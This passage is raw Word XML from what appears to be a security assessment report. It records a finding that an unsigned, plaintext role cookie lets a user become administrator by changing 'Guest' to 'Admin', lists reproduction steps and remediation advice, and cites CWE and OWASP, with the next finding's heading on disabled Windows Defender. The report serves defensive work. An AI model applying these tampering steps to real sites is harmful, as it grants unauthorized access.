        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6EF25725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this value to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6EF25725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>determine</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6EF25725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> access levels. An attacker c</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21CD4110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21CD4110">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21CD4110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cookie value from guest to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C7D07F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21CD4110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the server accepts the modified value without verification, granti</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FE1E2D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng administrative access to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="69CF3A70" w14:textId="38510409">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FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="0BEB66A3" w14:textId="7CF2B4E8">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D143C22" w:rsidP="0D325B6E" w:rsidRDefault="4D143C22" w14:paraId="04974423" w14:textId="67E2A3BF">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D143C22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This vulnerability can allow for a low-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="488381C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D143C22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or unauthorized user to gain </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="58BECFB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrative</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D143C22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2155E414">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webserver</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D143C22">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CBFEC0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6CBFEC0D">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3D9150FE">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CBFEC0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to view sensitive information, including other user data, alter sensitive information, or take down or change the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6CBFEC0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E43D0E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webserver</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6CBFEC0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60D4E7E0" w14:textId="08A16829">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FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="3819CCF8" w14:textId="526EB3E4">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FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="1E66321B" w14:textId="2F9CB082">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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Authenticate as a guest user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB3447" w:rsidP="0D325B6E" w:rsidRDefault="51CB3447" w14:paraId="6ACC6A12" w14:textId="3C8D0EDA">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 xml:space="preserve"> the cookies set in browser dev tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB3447" w:rsidP="0D325B6E" w:rsidRDefault="51CB3447" w14:paraId="3DB3435E" w14:textId="4D5CBC7E">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 xml:space="preserve">Step 3: Alter </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51CB3447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘Guest’ to ‘Admin’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB3447" w:rsidP="0D325B6E" w:rsidRDefault="51CB3447" w14:paraId="47DFA663" w14:textId="3498EC1D">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 xml:space="preserve">Step 4: Reload the page and </w:t>
      </w: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51CB3447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin panel is now visible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2E3E1C26" w14:textId="4D10761E">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FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="4FA3AA04" w14:textId="033F6757">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FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="1FC70A38" w14:textId="2C4D8100">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FA0E05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EA8B0C3" w:rsidP="0D325B6E" w:rsidRDefault="5EA8B0C3" w14:paraId="570246BA" w14:textId="37E34B41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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EA8B0C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do not store role or permission data as mutable, plaintext cookies on the client-side. Store only a server-generated session iden</w:t>
      </w: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 xml:space="preserve">tifier and </w:t>
      </w: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maintain</w:t>
      </w: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 xml:space="preserve"> authoritative user/role permission on the server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F54104E" w:rsidP="0D325B6E" w:rsidRDefault="7F54104E" w14:paraId="1EF5D369" w14:textId="1FA5235E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Remove any logic that grants admin access purely based on unsigned cookie values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F54104E" w:rsidP="0D325B6E" w:rsidRDefault="7F54104E" w14:paraId="2C5B1C0C" w14:textId="2F8FEA50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 xml:space="preserve">Use signed tokens (JWT) and always </w:t>
      </w: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validate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7F54104E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the signature and claims server-side</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="350DAE03" w:rsidP="0D325B6E" w:rsidRDefault="350DAE03" w14:paraId="16B63A35" w14:textId="3AE16535">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>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0DAE03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the cookie to have the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="350DAE03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="350DAE03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7243A527" w14:textId="4D1D970F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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3FA0E051" w:rsidP="0D325B6E" w:rsidRDefault="3FA0E051" w14:paraId="3F07D4D3" w14:textId="2F23D693">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FA0E05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5C8E595" w:rsidP="0D325B6E" w:rsidRDefault="45C8E595" w14:paraId="1FCCC25A" w14:textId="6A254A7B">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4e0398b3088c451d">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="45C8E595">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MITRE CWE - Reliance on Cookies without Validation and Integrity Checking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3147C6C9" w:rsidP="0D325B6E" w:rsidRDefault="3147C6C9" w14:paraId="15BEC770" w14:textId="239CEFFC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R9a3be7dcae364e01">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3147C6C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Testing for Cookie Attributes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="631D9BF0" w14:textId="7EA6D58B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="49AC081E" w14:textId="77EE8F4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4FC45D63" w14:textId="1F55F096">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D34443B" w14:textId="5DDF4F1F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1C628732" w:rsidP="0D325B6E" w:rsidRDefault="1C628732" w14:paraId="0A180412" w14:textId="2DF126C3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1539468749" w:id="1936614470"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1C628732">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1C628732">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1798637530" w:id="1605991873"/>
      <w:bookmarkStart w:name="_Toc322774009" w:id="239051133"/>
      <w:bookmarkStart w:name="_Toc1158273928" w:id="340123372"/>
      <w:bookmarkStart w:name="_Toc1586652968" w:id="1785883126"/>
      <w:bookmarkStart w:name="_Toc282610369" w:id="1148569464"/>
      <w:bookmarkStart w:name="_Toc1364917830" w:id="2142607142"/>
      <w:bookmarkStart w:name="_Toc832112457" w:id="1848485484"/>
      <w:bookmarkStart w:name="_Toc1373495005" w:id="479023607"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34A17402">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Defender Disabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1605991873"/>
      <w:bookmarkEnd w:id="239051133"/>
      <w:bookmarkEnd w:id="340123372"/>
      <w:bookmarkEnd w:id="1785883126"/>
      <w:bookmarkEnd w:id="1148569464"/>
      <w:bookmarkEnd w:id="2142607142"/>
      <w:bookmarkEnd w:id="1848485484"/>
      <w:bookmarkEnd w:id="479023607"/>
      <w:bookmarkEnd w:id="193661447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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2064E5B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7B5A52" w14:textId="3E12A34A">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04DB9D" w14:textId="600BF865">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0F96F02" w14:textId="4AFCB187">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7E8479A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3914AC" w14:textId="2E78954C">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72ABE5" w:rsidP="0D325B6E" w:rsidRDefault="0D72ABE5" w14:paraId="579E7482" w14:textId="10550C4E">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FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D72ABE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCap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779B50F" w:rsidP="0D325B6E" w:rsidRDefault="4779B50F" w14:paraId="5FE898B5" w14:textId="642D4B8C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4779B50F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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A1B8DD9" w:rsidP="0D325B6E" w:rsidRDefault="4A1B8DD9" w14:paraId="42EAFB85" w14:textId="5EA9E19D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
